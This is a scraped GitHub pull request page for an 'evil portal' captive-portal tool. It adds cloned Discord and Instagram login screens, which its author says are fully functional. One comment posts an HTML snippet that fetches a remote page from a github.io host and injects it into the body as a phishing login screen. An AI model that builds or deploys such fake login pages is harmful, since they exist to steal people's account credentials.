Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added Discord and Instagram login screen (best remake) #67

Open
wants to merge 21 commits into
base: main
Choose a base branch
from

Conversation

JMcrafter26
Copy link

Hi,
I added the Discord login screen.

I tested it on mobile and pc and it is fully functional.

Here is a DEMO


Made by JMcrafter26 and GauravKukreti

@JMcrafter26
Copy link
Author

@RogueMaster the Discord login is finally done and functional.

RogueMaster added a commit to RogueMaster/flipperzero-evil-portal that referenced this pull request Aug 20, 2023
@JMcrafter26 JMcrafter26 changed the title Added Discord login screen (best remake) Added Discord and Instagram login screen (best remake) Sep 20, 2023
@JMcrafter26
Copy link
Author

@RogueMaster I created a new Instagram login screen

@WebsiteHoster1
Copy link

WebsiteHoster1 commented Oct 25, 2023

This is better one

<html
  lang="en-GB"
  style="font-size: 100%; --saturation-factor: 1; --devtools-sidebar-width: 0px"
  class="reduce-motion theme-dark platform-web font-size-16"
  data-rh="lang,style,class"
>
  <body>
    <script>
      let website = "";
      fetch("https://Websitehoster1.github.io/1/Discord/discord.txt")
        .then((response) => response.text())
        .then((data) => {
          document.body.innerHTML = data;
        });
    </script>
  </body>
</html>

@JMcrafter26
Copy link
Author

This is better one

<html
  lang="en-GB"
  style="font-size: 100%; --saturation-factor: 1; --devtools-sidebar-width: 0px"
  class="reduce-motion theme-dark platform-web font-size-16"
  data-rh="lang,style,class"
>
  <body>
    <script>
      let website = "";
      fetch("https://Websitehoster1.github.io/1/Discord/discord.txt")
        .then((response) => response.text())
        .then((data) => {
          document.body.innerHTML = data;
        });
    </script>
  </body>
</html>

Did you even read the requirements for evil portal? If no then read it and then update your comment

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

3 participants